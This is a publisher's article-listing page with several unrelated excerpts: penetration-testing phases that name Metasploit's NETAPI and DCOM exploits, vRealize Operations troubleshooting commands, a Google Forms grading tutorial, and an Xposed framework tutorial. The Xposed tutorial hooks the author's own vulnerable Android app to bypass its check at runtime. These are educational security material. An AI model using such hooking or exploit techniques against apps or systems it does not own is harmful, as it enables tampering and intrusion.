ingress traffic rather than egress traffic. Coming back to the procedures involved in the intelligence-gathering phase when viewed as a process are as follows: Target selection: This involves selecting the targets to attack, identifying the goals of the attack, and the time of the attack. Covert gathering: This involves on-location gathering, the equipment in use, and dumpster diving. In addition, it covers off-site gathering that involves data warehouse identification; this phase is generally considered during a white box penetration test. Foot printing: This involves active or passive scans to identify various technologies used at the target, which includes port scanning, banner grabbing, and so on. Identifying protection mechanisms: This involves identifying firewalls, filtering systems, network- and host-based protections, and so on. For more information on gathering intelligence, refer to http://www.pentest-standard.org/index.php/Intelligence_Gathering Predicting the test grounds A regular occurrence during penetration testers' lives is when they start testing an environment, they know what to do next. If they come across a Windows box, they switch their approach towards the exploits that work perfectly for Windows and leave the rest of the options. An example of this might be an exploit for the NETAPI vulnerability, which is the most favorable choice for exploiting a Windows XP box. Suppose a penetration tester needs to visit an organization, and before going there, they learn that 90 percent of the machines in the organization are running on Windows XP, and some of them use Windows 2000 Server. The tester quickly decides that they will be using the NETAPI exploit for XP-based systems and the DCOM exploit for Windows 2000 server from Metasploit to complete the testing phase successfully. However, we will also see how we can use these exploits practically in the latter section of this article. Consider another example of a white box test on a web server where the server is hosting ASP and ASPX pages. In this case, we switch our approach to use Windows-based exploits and IIS testing tools, therefore ignoring the exploits and tools for Linux. Hence, predicting the environment under a test helps to build the strategy of the test that we need to follow at the client's site. For more information on the NETAPI vulnerability, visit http://technet.microsoft.com/en-us/security/bulletin/ms08-067. For more information on the DCOM vulnerability, visit http://www.rapid7.com/db/modules/exploit/Windows /dcerpc/ms03_026_dcom. Modeling threats In order to conduct a comprehensive penetration test, threat modeling is required. This phase focuses on modeling out correct threats, their effect, and their categorization based on the impact they can cause. Based on the analysis made during the intelligence-gathering phase, we can model the best possible attack vectors. Threat modeling applies to business asset analysis, process analysis, threat analysis, and threat capability analysis. This phase answers the following set of questions: How can we attack a particular network? To which crucial sections do we need to gain access? What approach is best suited for the attack? What are the highest-rated threats? Modeling threats will help a penetration tester to perform the following set of operations: Gather relevant documentation about high-level threats Identify an organization's assets on a categorical basis Identify and categorize threats Mapping threats to the assets of an organization Modeling threats will help to define the highest priority assets with threats that can influence these assets. Now, let us discuss a third example. Consider a black box test against a company's website. Here, information about the company's clients is the primary asset. It is also possible that in a different database on the same backend, transaction records are also stored. In this case, an attacker can use the threat of a SQL injection to step over to the transaction records database. Hence, transaction records are the secondary asset. Mapping a SQL injection attack to primary and secondary assets is achievable during this phase. Vulnerability scanners such as Nexpose and the Pro version of Metasploit can help model threats clearly and quickly using the automated approach. This can prove to be handy while conducting large tests. For more information on the processes involved during the threat modeling phase, refer to http://www.pentest-standard.org/index.php/Threat_Modeling. Vulnerability analysis Vulnerability analysis is the process of discovering flaws in a system or an application. These flaws can vary from a server to web application, an insecure application design for vulnerable database services, and a VOIP-based server to SCADA-based services. This phase generally contains three different mechanisms, which are testing, validation, and research. Testing consists of active and passive tests. Validation consists of dropping the false positives and confirming the existence of vulnerabilities through manual validations. Research refers to verifying a vulnerability that is found and triggering it to confirm its existence. For more information on the processes involved during the threat-modeling phase, refer to http://www.pentest-standard.org/index.php/Vulnerability_Analysis. Exploitation and post-exploitation The exploitation phase involves taking advantage of the previously discovered vulnerabilities. This phase is considered as the actual attack phase. In this phase, a penetration tester fires up exploits at the target vulnerabilities of a system in order to gain access. This phase is covered heavily throughout the article. The post-exploitation phase is the latter phase of exploitation. This phase covers various tasks that we can perform on an exploited system, such as elevating privileges, uploading/downloading files, pivoting, and so on. For more information on the processes involved during the exploitation phase, refer to http://www.pentest-standard.org/index.php/Exploitation. For more information on post exploitation, refer to http://www.pentest-standard.org/index.php/Post_Exploitation. Reporting Creating a formal report of the entire penetration test is the last phase to conduct while carrying out a penetration test. Identifying key vulnerabilities, creating charts and graphs, recommendations, and proposed fixes are a vital part of the penetration test report. An entire section dedicated to reporting is covered in the latter half of this article. For more information on the processes involved during the threat modeling phase, refer to http://www.pentest-standard.org/index.php/Reporting. Mounting the environment Before going to a war, the soldiers must make sure that their artillery is working perfectly. This is exactly what we are going to follow. Testing an environment successfully depends on how well your test labs are configured. Moreover, a successful test answers the following set of questions: How well is your test lab configured? Are all the required tools for testing available? How good is your hardware to support such tools? Before we begin to test anything, we must make sure that all the required set of tools are available and that everything works perfectly. Summary Throughout this article, we have introduced the phases involved in penetration testing. We have also seen how we can set up Metasploit and conduct a black box test on the network. We recalled the basic functionalities of Metasploit as well. We saw how we could perform a penetration test on two different Linux boxes and Windows Server 2012. We also looked at the benefits of using databases in Metasploit. After completing this article, we are equipped with the following: Knowledge of the phases of a penetration test The benefits of using databases in Metasploit The basics of the Metasploit framework Knowledge of the workings of exploits and auxiliary modules Knowledge of the approach to penetration testing with Metasploit The primary goal of this article was to inform you about penetration test phases and Metasploit. We will dive into the coding part of Metasploit and write our custom functionalities to the Metasploit framework. Resources for Article: Further resources on this subject: Introducing Penetration Testing [article] Open Source Intelligence [article] Ruby and Metasploit Modules [article]
Read more
  • 0
  • 0
  • 37125

article-image-troubleshooting-in-vrealize-operations-components
Vijin Boricha
06 Jun 2018
11 min read
Save for later

Troubleshooting techniques in vRealize Operations components

Vijin Boricha
06 Jun 2018
11 min read
vRealize Operations Manager helps in managing the health, efficiency and compliance of virtualized environments. In this tutorial, we have covered the latest troubleshooting techniques of vRealize Operations. Let's see what we can do to monitor and troubleshoot the key vRealize Operations components and services. This is an excerpt from Mastering vRealize Operations Manager - Second Edition written by Spas Kaloferov, Scott Norris, and Christopher Slater. Troubleshooting Services Let's first take a look into some of the most important vRealize Operations services. The Apache2 service vRealize Operations internally uses the Apache2 web server to host Admin UI, Product UI, and Suite API. Here are some useful service log locations: Log file nameLocationPurposeaccess_log & error_logstorage/log/var/log/apache2 Stores log information for the Apache service The Watchdog service Watchdog is a vRealize Operations service that maintains the necessary daemons/services and attempts to restart them as necessary should there be any failure. The vcops-watchdog is a Python script that runs every 5 minutes by means of the vcops-watchdog-daemon with the purpose of monitoring the various vRealize Operations services, including CaSA. The Watchdog service performs the following checks: PID file of the service Service status Here are some useful service log locations: Log file nameLocationPurposevcops-watchdog.log/usr/lib/vmware-vcops/user/log/vcops-watchdog/Stores log information for the WatchDog service The Collector service The Collector service sends a heartbeat to the controller every 30 seconds. By default, the Collector will wait for 30 minutes for adapters to synchronize. The collector properties, including enabling or disabling Self Protection, can be configured from the collector.properties properties file located in /usr/lib/vmware-vcops/user/conf/collector. Here are some useful service log locations: Log file nameLocationPurposecollector.log/storage/log/vcops/log/Stores log information for the Collector service The Controller service The Controller service is part of the analytics engine. The controller does the decision making on where new objects should reside. The controller manages the storage and retrieval of the inventory of the objects within the system. The Controller service has the following uses: It will monitor the collector status every minute How long a deleted resource is available in the inventory How long a non-existing resource is stored in the database Here are some useful service file locations: Log file nameLocationPurposecontroller.properties/usr/lib/vmware-vcops/user/conf/controller/Stores properties information for the Controller service Databases As we learned, vRealize Operations contains quite a few databases, all of which are of great importance for the function of the product. Let’s take a deeper look into those databases. Cassandra DB Currently, Cassandra DB stores the following information: User Preferences and Config Alerts definition Customizations Dashboards, Policies, and View Reports and Licensing Shard Maps Activities Cassandra stores all the information which we see in the content folder; basically, any settings which are applied globally. You are able to log into the Cassandra database from any Analytic Node. The information is the same across nodes. There are two ways to connect to the Cassandra database: cqlshrc is a command-line tool used to get the data within Cassandra, in a SQL-like fashion (inbuilt). To connect to the DB, run the following from the command line (SSH): $VMWARE_PYTHON_BIN $ALIVE_BASE/cassandra/apache-cassandra-2.1.8/bin/cqlsh --ssl --cqlshrc $ALIVE_BASE/user/conf/cassandra/cqlshrc Once you are connected to the DB, we need to navigate to the globalpersistence key space using the following command: vcops_user@cqlsh&gt; use globalpersistence ; The nodetool command-line tool Once you are logged on to the Cassandra DB, we can run the following commands to see information: Command syntaxPurposeDescribe tablesTo list all the relation (tables) in the current database instanceDescribe &lt;table_name&gt;To list the content of that particular tableExitTo exit the Cassandra command lineselect commandTo select any Column data from a tabledelete commandTo delete any Column data from a table Some of the important tables in Cassandra are: Table namePurposeactivity_2_tblStores all the activitiestbl_2a8b303a3ed03a4ebae2700cbfae90bfStores the Shard mapping information of an object (table name may be differ in each environment)supermetricStores the defined super metricspolicyStores all the defined policiesAuthStores all the user details in the clusterglobal_settingsAll the configured global settings are stored herenamespace_to_classtypeInforms what type of data is stored in what table under CassandrasymptomproblemdefinitionAll the defined symptomscertificatesStores all the adapter and data source certificates The Cassandra database has the following configuration files: File typeLocationCassandra.yaml/usr/lib/vmware-vcops/user/conf/cassandra/vcops_cassandra.properties/usr/lib/vmware-vcops/user/conf/cassandra/Cassandra conf scripts/usr/lib/vmware_vcopssuite/utilities/vmware/vcops/cassandra/ The Cassandra.yaml file stores certain information such as the default location to save data (/storage/db/vcops/cassandra/data). The file contains information about all the nodes. When a new node joins the cluster, it refers to this file to make sure it contacts the right node (master node). It also has all the SSL certificate information. Cassandra is started and stopped via the CaSA service, but just because CaSA is running does not mean that the Cassandra service is necessarily running. The service command to check the status of the Cassandra DB service from the command line (SSH) is: service vmware-vcops status cassandra The Cassandra cassandraservice.Sh is located in: $VCOPS_BASE/cassandra/bin/ Here are some useful Cassandra DB log locations: Log File NameLocationPurposeSystem.log/usr/lib/vmware-vcops/user/log/cassandraStores all the Cassandra-related activitieswatchdog_monitor.log/usr/lib/vmware-vcops/user/log/cassandraStores Cassandra Watchdog logswrapper.log/usr/lib/vmware-vcops/user/log/cassandraStores Cassandra start and stop-related logsconfigure.log /usr/lib/vmware-vcops/user/log/cassandraStores logs related to Python scripts of vRopsinitial_cluster_setup.log/usr/lib/vmware-vcops/user/log/cassandraStores logs related to Python scripts of vRopsvalidate_cluster.log/usr/lib/vmware-vcops/user/log/cassandraStores logs related to Python scripts of vRops To enable debug logging for the Cassandra database, edit the logback.xml XML file located in: /usr/lib/vmware-vcops/user/conf/cassandra/ Change &lt;root level="INFO"&gt; to &lt;root level="DEBUG"&gt;. The System.log will not show the debug logs for Cassandra. If you experience any of the following issues, this may be an indicator that the database has performance issues, and so you may need to take the appropriate steps to resolve them: Relationship changes are not be reflected immediately Deleted objects still show up in the tree View and Reports takes slow in processing and take a long time to open. Logging on to the Product UI takes a long time for any user Alert was supposed to trigger but it never happened Cassandra can tolerate 5 ms of latency at any given point of time. You can validate the cluster by running the following command from the command line (SSH). First, navigate to the following folder: /usr/lib/vmware-vcopssuite/utilities/ Run the following command to validate the cluster: $VMWARE_PYTHON_BIN -m vmware.vcops.cassandra.validate_cluster &lt;IP_ADDRESS_1 IP_ADDRESS_2&gt; You can also use the nodetool to perform a health check, and possibly resolve database load issues. The command to check the load status of the activity tables in vRealize Operations version 6.3 and older is as follows: $VCOPS_BASE/cassandra/apache-cassandra-2.1.8/bin/nodetool --port 9008 status For the 6.5 release and newer, VMware added the requirement of using a 'maintenanceAdmin' user along with a password file. The new command is as follows: $VCOPS_BASE/cassandra/apache-cassandra-2.1.8/bin/nodetool -p 9008 --ssl -u maintenanceAdmin --password-file /usr/lib/vmware-vcops/user/conf/jmxremote.password status Regardless of which method you choose to perform the health check, if any of the nodes have over 600 MB of load, you should consult with VMware Global Support Services on the next steps to take, and how to elevate the load issues. Central (Repl DB) The Postgres database was introduced in 6.1. It has two instances in version 6.6. The Central Postgres DB, also called repl, and the Alerts/HIS Postgres DB, also called data, are two separate database instances under the database called vcopsdb. The central DB exists only on the master and the master replica nodes when HA is enabled. It is accessible via port 5433 and it is located in /storage/db/vcops/vpostgres/repl. Currently, the database stores the Resources inventory. You can connect to the central DB from the command line (SSH). Log in on the analytic node you wish to connect to and run: su - postgres The command should not prompt for a password if ran as root. Once logged in, connect to the database instance by running: /opt/vmware/vpostgres/current/bin/psql -d vcopsdb -p 5433 The service command to start the central DB from the command line (SSH) is: service vpostgres-repl start Here are some useful log locations: Log file nameLocationPurposepostgresql-&lt;xx&gt;.log/storage/db/vcops/vpostgres/data/pg_logProvides information on Postgres database cleanup and other disk-related information Alerts/HIS (Data) DB The Alerts DB is called data on all the data nodes including the master and master replica node. It was again introduced in 6.1. Starting from 6.2, the  Historical Inventory Service xDB was merged with the Alerts DB. It is accessible via port 5432 and it is located in /storage/db/vcops/vpostgres/data. Currently, the database stores: Alerts and alarm history History of resource property data History of resource relationship You can connect to the Alerts DB from the command line (SSH). Log in on the analytic node you wish to connect to and run: su - postgres The command should not prompt for a password if ran as root. Once logged in, connect to the database instance by running: /opt/vmware/vpostgres/current/bin/psql -d vcopsdb -p 5432 The service command to start the Alerts DB from the command line (SSH) is: service vpostgres start FSDB The File System Database (FSDB) contains all raw time series metrics and super metrics data for the discovered resources. What is FSDB in vRealize Operations Manager?: FSDB is a GemFire server and runs inside analytics JVM. FSDB in vRealize Operations uses the Sharding Manager to distribute data between nodes (new objects). (We will discuss what vRealize Operations cluster nodes are later in this chapter.) The File System Database is available in all the nodes of a vRops Cluster deployment. It has its own properties file. FSDB stores data (time series data ) collected by adapters and data which is generated/calculated (system, super, badge, CIQ metrics, and so on) based on analysis of that data. If you are troubleshooting FSDB performance issues, you should start from the Self Performance Details dashboard, more precisely, the FSDB Data Processing widget. We covered both of these earlier in this chapter. You can also take a look at the metrics provided by the FSDB Metric Picker: You can access it by navigating to the Environment tab, vRealize Operations Clusters, selecting a node, and selecting vRealize Operations Manager FSDB. Then, select the All Metrics tab. You can check the synchronization state of the FSDB to determine the overall health of the cluster by running the following command from the command line (SSH): $VMWARE_PYTHON_BIN /usr/lib/vmware-vcops/tools/vrops-platform-cli/vrops-platform-cli.py getShardStateMappingInfo By restarting the FSDB, you can trigger synchronization of all the data by getting missing data from other FSDBs. Synchronization takes place only when you have vRealize Operations HA configured. Here are some useful log locations for FSDB: Log file nameLocaitonPurposeAnalytics-&lt;UUID&gt;.log/usr/lib/vmware-vcops/user/log Used to check the Sharding Module functionality Can trace which objects have synced ShardingManager_&lt;UUID&gt;.log/usr/lib/vmware-vcops/user/logCan be used to get the total time the sync tookfsdb-accessor-&lt;UUID&gt;.log/usr/lib/vmware-vcops/user/logProvides information on FSDB database cleanup and other disk-related information Platform-cli Platform-cli is a tool by which we can get information from various databases, including the GemFire cache, Cassandra, and the Alerts/HIS persistence databases. In order to run this Python script, you need to run the following command: $VMWARE_PYTHON_BIN /usr/lib/vmware-vcops/tools/vrops-platform-cli/vrops-platform-cli.py The following example of using this command will list all the resources in ascending order and also show you which shard it is stored on: $VMWARE_PYTHON_BIN /usr/lib/vmware-vcops/tools/vrops-platform-cli/vrops-platform-cli.py getResourceToShardMapping We discussed how to troubleshoot some of the most important components like services and databases along with troubleshooting failures in the upgrade process. To know more about self-monitoring dashboards and infrastructure compliance, check out this book Mastering vRealize Operations Manager - Second Edition. What to expect from vSphere 6.7 Introduction to SDN – Transformation from legacy to SDN Learning Basic PowerCLI Concepts
Read more
  • 0
  • 0
  • 37112

article-image-google-forms-multiple-choice-and-fill-blank-assignments
Packt
28 Sep 2016
14 min read
Save for later

Google Forms for Multiple Choice and Fill-in-the-blank Assignments

Packt
28 Sep 2016
14 min read
In this article by Michael Zhang, the author of the book Teaching with Google Classroom, we will see how to create multiple choice and fill-in-the-blank assignments using Google Forms. (For more resources related to this topic, see here.) The third-party app, Flubaroo will help grade multiple choice, fill-in-the-blank, and numeric questions. Before you can use Flubaroo, you will need to create the assignment and deploy it on Google Classroom. The Form app of Google within the Google Apps for Education (GAFE) allows you to create online surveys, which you can use as assignments. Google Forms then outputs the values of the form into a Google Sheet, where the Google Sheet add-on, Flubaroo grades the assignment. After using Google Forms and Flubaroo for assignments, you may decide to also use it for exams. However, while Google Forms provides a means for creating the assessment and Google Classroom allows you to easily distribute it to your students, there is no method to maintain security of the assessment. Therefore, if you choose to use this tool for summative assessment, you will need to determine an appropriate level of security. (Often, there is nothing that prevents students from opening a new tab and searching for an answer or from messaging classmates.) For example, in my classroom, I adjusted the desks so that there was room at the back of the classroom to pace during a summative assessment. Additionally, some school labs include a teacher's desktop that has software to monitor student desktops. Whatever method you choose, take precautions to ensure the authenticity of student results when assessing students online. Google Forms is a vast Google App that requires its own book to fully explore its functionality. Therefore, the various features you will explore in this article will focus on the scope of creating and assessing multiple choice and fill-in-the-blank assignments. However, once you are familiar with Google Forms, you will find additional applications. For example, in my school, I work with the administration to create forms to collect survey data from stakeholders such as staff, students, and parents. Recently, for our school's annual Open House, I created a form to record the number of student volunteers so that enough food for the volunteers would be ordered. Also, during our school's major fundraiser, I developed a Google Form for students to record donations so that reports could be generated from the information more quickly than ever before. The possibilities of using Google Forms within a school environment are endless! In this article, you will explore the following topics: Creating an assignment with Google Forms Installing the Flubaroo Google Sheets add-on Assessing an assignment with Flubaroo Creating a Google Form Since Google Forms is not as well known as apps such as Gmail or Google Calendar, it may not be immediately visible in the App Launcher. To create a Google Form, follow these instructions: In the App Launcher, click on the More section at the bottom: Click on the Google Forms icon: If there is still no Google Forms app icon, open a new tab and type forms.google.com into the address bar. Click on the Blank template to create a new Google Form: Google Forms has a recent update to Google's Material Design interface. This article will use screenshots from the new Google Forms look. Therefore, if you see a banner with Try the new Google Forms, click on the banner to launch the new Google Forms App: To name the Google Form, click on Untitled form in the top-left corner and type in the name. This will also change the name of the form. If necessary, you can click on the form title to change the title afterwards: Optionally, you can add a description to the Google Form directly below the form title: Often, I use the description to provide further instructions or information such as time limit, whether dictionaries or other reference books are permissible or even website addresses to where they can find information related to the assignment. Adding questions to a Google form By default, each new Google Form will already have a multiple choice card inserted into the form. In order to access the options, click on anywhere along the white area beside Untitled Question: The question will expand to form a question card where you can make changes to the question: Type the question stem in the Untitled Question line. Then, click on Option 1 to create a field to change it to a selection: To add additional selectors, click on the Add option text below the current selector or simply press the Enter key on the keyboard to begin the next selector. Because of the large number of options in a question card, the following screenshot provides a brief description of these options: A: Question title B: Question options C: Move the option indicator. Hovering your mouse over an option will show this indicator that you can click and drag to reorder your options. D: Move the question indicator. Clicking and dragging this indicator will allow you to reorder your questions within the assignment. E: Question type drop-down menu. There are several types of questions you can choose from. However, not all will work with the Flubaroo grading add-on. The following screenshot displays all question types available: F: Remove option icon. G: Duplicate question button. Google Forms will make a copy of the current question. H: Delete question button. I: Required question switch. By enabling this option, students must answer this question in order to complete the assignment. J: More options menu. Depending on the type of question, this section will provide options to enable a hint field below the question title field, create nonlinear multiple choice assignments, and validate data entered into a specific field. Flubaroo grades the assignment from the Google Sheet that Google Forms creates. It matches the responses of the students with an answer key. While there is tolerance for case sensitivity and a range of number values, it cannot effectively grade answers in the sentence or paragraph form. Therefore, use only short answers for the fill-in-the-blank or numerical response type questions and avoid using paragraph questions altogether for Flubaroo graded assignments. Once you have completed editing your question, you can use the side menu to add additional questions to your assignment. You can also add section headings, images, YouTube videos, and additional sections to your assignment. The following screenshot provides a brief legend for the icons:   To create a fill-in-the-blank question, use the short answer question type. When writing the question stem, use underscores to indicate where the blank is in the question. You may need to adjust the wording of your fill-in-the-blank questions when using Google Forms. Following is an example of a fill-in-the-blank question: Identify your students Be sure to include fields for your students name and e-mail address. The e-mail address is required so that Flubaroo can e-mail your student their responses when complete. Google Forms within GAFE also has an Automatically collect the respondent's username option in the Google Form's settings, found in the gear icon. If you use the automatic username collection, you do not need to include the name and e-mail fields. Changing the theme of a Google form Once you have all the questions in your Google Form, you can change the look and feel of the Google Form. To change the theme of your assignment, use the following steps: Click on the paint pallet icon in the top-right corner of the Google Form: For colors, select the desired color from the options available. If you want to use an image theme, click on the image icon at the bottom right of the menu: Choose a theme image. You can narrow the type of theme visible by clicking on the appropriate category in the left sidebar: Another option is to upload your own image as the theme. Click on the Upload photos option in the sidebar or select one image from your Google Photos using the Your Albums option. The application for Google Forms within the classroom is vast. With the preceding features, you can add images and videos to your Google Form. Furthermore, in conjunction with the Google Classroom assignments, you can add both a Google Doc and a Google Form to the same assignment. An example of an application is to create an assignment in Google Classroom where students must first watch the attached YouTube video and then answer the questions in the Google Form. Then Flubaroo will grade the assignment and you can e-mail the students their results. Assigning the Google Form in Google classroom Before you assign your Google Form to your students, preview the form and create a key for the assignment by filling out the form first. By doing this first, you will catch any errors before sending the assignment to your students, and it will be easier to find when you have to grade the assignment later. Click on the eye shaped preview icon in the top-right corner of the Google form to go to the live form: Fill out the form with all the correct answers. To find this entry later, I usually enter KEY in the name field and my own e-mail address for the e-mail field. Now the Google Form is ready to be assigned in Google Classroom. In Google Classroom, once students have submitted a Google Form, Google Classroom will automatically mark the assignment as turned in. Therefore, if you are adding multiple files to an assignment, add the Google Form last and avoid adding multiple Google Forms to a single assignment. To add a Google Form to an assignment, follow these steps: In the Google Classroom assignment, click on the Google Drive icon: Select the Google Form and click on the Add button: Add any additional information and assign the assignment. Installing Flubaroo Flubaroo, like Goobric and Doctopus, is a third-party app that provides additional features that help save time grading assignments. Flubaroo requires a one-time installation into Google Sheets before it can grade Google Form responses. While we can install the add-on in any Google Sheet, the following steps will use the Google Sheet created by Google Forms: In the Google Form, click on the RESPONSES tab at the top of the form: Click on the Google Sheets icon: A pop-up will appear. The default selection is to create a new Google Sheet. Click on the CREATE button: A new tab will appear with a Google Sheet with the Form's responses. Click on the Add-ons menu and select Get add-ons…: Flubaroo is a popular add-on and may be visible in the first few apps to click on. If not, search for the app with the search field and then click on it in the search results. Click on the FREE button: The permissions pop-up will appear. Scroll to the bottom and click on the Allow button to activate Flubaroo: A pop-up and sidebar will appear in Google Sheets to provide announcements and additional instructions to get started: Assessing using Flubaroo When your students have submitted their Google Form assignment, you can grade them with Flubaroo. There are two different settings for grading with it—manual and automatic. Manual grading will only grade responses when you initiate the grading; whereas, automatic grading will grade responses as they are submitted. Manual grading To assess a Google Form assignment with Flubaroo, follow these steps: If you have been following along from the beginning of the article, select Grade Assignment in the Flubaroo submenu of the Add-ons menu: If you have installed Flubaroo in a Google Sheet that is not the form responses, you will need to first select Enable Flubaroo in this sheet in the Flubaroo submenu before you will be able to grade the assignment: A pop-up will guide you through the various settings of Flubaroo. The first page is to confirm the columns in the Google Sheet. Flubaroo will guess whether the information in a column identifies the student or is graded normally. Under the Grading Options drop-down menu, you can also select Skip Grading or Grade by Hand. If the question is undergoing normal grading, you can choose how many points each question is worth. Click on the Continue button when all changes are complete: In my experience, Flubaroo accurately guesses which fields identify the student. Therefore, I usually do not need to make changes to this screen unless I am skipping questions or grading certain ones by hand. The next page shows all the submissions to the form. Click on the radio button beside the submission that is the key and then click on the Continue button: Flubaroo will show a spinning circle to indicate that it is grading the assignment. It will finish when you see the following pop-up: When you close the pop-up, you will see a new sheet created in the Google Sheet summarizing the results. You will see the class average, the grades of individual students as well as the individual questions each student answered correctly: Once Flubaroo grades the assignment, you can e-mail students the results. In the Add-ons menu, select Share Grades under the Flubaroo submenu: A new pop-up will appear. It will have options to select the appropriate column for the e-mail of each submission, the method to share grades with the students, whether to list the questions so that students know which questions they got right and which they got wrong, whether to include an answer key, and a message to the students. The methods to share grades include e-mail, a file in Google Drive, or both. Once you have chosen your selections, click on the Continue button: A pop-up will confirm that the grades have successfully been e-mailed. Google Apps has a daily quota of 2000 sent e-mails (including those sent in Gmail or any other Google App). While normally not an issue. If you are using Flubaroo on a large scale, such as a district-wide Google Form, this limit may prevent you from e-mailing results to students. In this case, use the Google Drive option instead. If needed, you can regrade submissions. By selecting this option in the Flubaroo submenu, you will be able to change settings, such as using a different key, before Flubaroo will regrade all the submissions. Automatic grading Automatic grading provides students with immediate feedback once they submit their assignments. You can enable automatic grading after first setting up manual grading so that any late assignments get graded. Or you can enable automatic grading before assigning the assignment. To enable automatic grading on a Google Sheet that has already been manually graded, select Enable Autograde from the Advanced submenu of Flubaroo, as shown in the following screenshot: A pop-up will appear allowing you to update the grading or e-mailing settings that were set during the manual grading. If you select no, then you will be taken through all the pop-up pages from the Manual grading section so that you can make necessary changes. If you have not graded the assignment manually, when you select Enable Autograde, you will be prompted by a pop-up to set up grading and e-mailing settings, as shown in the following screenshot. Clicking on the Ok button will take you through the setting pages shown in the preceding Manual grading section: Summary In this article, you learned how to create a Google Form, assign it in Google Classroom, and grade it with the Google Sheet's Flubaroo add-on. Using all these apps to enhance Google Classroom shows how the apps in the GAFE suite interact with each other to provide a powerful tool for you. Resources for Article: Further resources on this subject: Mapping Requirements for a Modular Web Shop App [article] Using Spring JMX within Java Applications [article] Fine Tune Your Web Application by Profiling and Automation [article]
Read more
  • 0
  • 2
  • 37110
article-image-hacking-android-apps-using-xposed-framework
Packt
13 Jul 2016
6 min read
Save for later

Hacking Android Apps Using the Xposed Framework

Packt
13 Jul 2016
6 min read
In this article by Srinivasa Rao Kotipalli and Mohammed A. Imran, authors of Hacking Android, we will discuss Android security, which is one of the most prominent emerging topics today. Attacks on mobile devices can be categorized into various categories, such as exploiting vulnerabilities in the kernel, attacking vulnerable apps, tricking users to download and run malware and thus stealing personal data from the device, and running misconfigured services on the device. OWASP has also released the Mobile top 10 list, helping the community better understand mobile security as a whole. Although it is hard to cover a lot in a single article, let's look at an interesting topic: the the runtime manipulation of Android applications. Runtime manipulation is controlling application flow at runtime. There are multiple tools and techniques out there to perform runtime manipulation on Android. This article discusses using the Xposed framework to hook onto Android apps. (For more resources related to this topic, see here.) Let's begin! Xposed is a framework that enables developers to write custom modules for hooking onto Android apps and thus modifying their flow at runtime. It was released by rovo89 in 2012. It works by placing the app_process binary in /system/bin/ directory, replacing the original app_process binary. app_process is the binary responsible for starting the zygote process. Basically, when an Android phone is booted, init runs /system/bin/app_process and gives the resulting process the name Zygote. We can hook onto any process that is forked from the Zygote process using the Xposed framework. To demonstrate the capabilities of Xposed framework, I have developed a custom vulnerable application. The package name of the vulnerable app is com.androidpentesting.hackingandroidvulnapp1. The code in the following screenshot shows how the vulnerable application works: This code has a method, setOutput, that is called when the button is clicked. When setOutput is called, the value of i is passed to it as an argument. If you notice, the value of i is initialized to 0. Inside the setOutput function, there is a check to see whether the value of i is equal to 1. If it is, this application will display the text Cracked. But since the initialized value is 0, this app always displays the text You cant crack it. Running the application in an emulator looks like this: Now, our goal is to write an Xposed module to modify the functionality of this app at runtime and thus printing the text Cracked. First, download and install the Xposed APK file in your emulator. Xposed can be downloaded from the following link: http://dl-xda.xposed.info/modules/de.robv.android.xposed.installer_v32_de4f0d.apk Install this downloaded APK file using the following command: adb install [file name].apk Once you've installed this app, launch it, and you should see the following screen: At this stage, make sure that you have everything set up before you proceed. Once you are done with the setup, navigate to the Modules tab, where we can see all the installed Xposed modules. The following figure shows that we currently don't have any modules installed: We will now create a new module to achieve the goal of printing the text Cracked in the target application shown earlier. We use Android Studio to develop this custom module. Here is the step-by-step procedure to simplify the process: The first step is to create a new project in Android Studio by choosing the Add No Actvity option, as shown in the following screenshot. I named it XposedModule. The next step is to add the XposedBridgeAPI library so that we can use Xposed-specific methods within the module. Download the library from the following link: http://forum.xda-developers.com/attachment.php?attachmentid=2748878&d=1400342298 Create a folder called provided within the app directory and place this library inside the provided directory. Now, create a folder called assets inside the app/src/main/ directory, and create a new file called xposed_init.We will add contents to this file in a later step.After completing the first 3 steps, our project directory structure should look like this: Now, open the build.gradle file under the app folder, and add the following line under the dependencies section: provided files('provided/[file name of the Xposed   library.jar]') In my case, it looks like this: Create a new class and name it XposedClass, as shown here: After you're done creating a new class, the project structure should look as shown in the following screenshot: Now, open the xposed_init file that we created earlier, and place the following content in it. com.androidpentesting.xposedmodule.XposedClass This looks like the following screenshot: Now, let's provide some information about the module by adding the following content to AndroidManifest.xml: <meta-data android_name="xposedmodule" android_value="true" />   <meta-data android_name="xposeddescription" android_value="xposed module to bypass the validation" />     <meta-data android_name="xposedminversion" android_value="54" /> Make sure that you add this content to the application section as shown here: Finally, write the actual code within in the XposedClass to add a hook. Here is the piece of code that actually bypasses the validation being done in the target application: Here's what we have done in the previous code: Firstly, our class is implementing IXposedHookLoadPackage We wrote the method implementation for the handleLoadPackage method—this is mandatory when we implement IXposedHookLoadPackage We set up the string values for classToHook and functionToHook An if condition is written to see whether the package name equals the target package name If package name matches, execute the custom code provided inside beforeHookedMethod Within the beforeHookedMethod, we are setting the value of i to 1 and thus when this button is clicked, the value of i will be considered as 1, and the text Cracked will be displayed as a toast message Compile and run this application just like any other Android app, and then check the Modules section of Xposed application. You should see a new module with the name XposedModule, as shown here: Select the module and reboot the emulator. Once the emulator has restarted, run the target application and click on the Crack Me button. As you can see in the screenshot, we have modified the application's functionality at runtime without actually modifying its original code. We can also see the logs by tapping on the Logs section. You can observe the XposedBridge.log method in the source code shown previously. This is the method used to log the following data shown: Summary Xposed without a doubt is one of the best frameworks available out there. Understanding frameworks such as Xposed is essential to understanding Android application security. This article demonstrated the capabilities of the Xposed framework to manipulate the apps at runtime. A lot of other interesting things can be done using Xposed, such as bypassing root detection and SSL pinning. Further resources on this subject: Speeding up Gradle builds for Android [article] https://www.packtpub.com/books/content/incident-response-and-live-analysis [article] Mobile Forensics [article]
Read more
  • 0
  • 0
  • 37060

article-image-microsoft-build-2019-microsoft-showcases-new-updates-to-ms-365-platfrom-with-focus-on-ai-and-developer-productivity
Sugandha Lahoti
07 May 2019
10 min read
Save for later

Microsoft Build 2019: Microsoft showcases new updates to MS 365 platform with focus on AI and developer productivity

Sugandha Lahoti
07 May 2019
10 min read
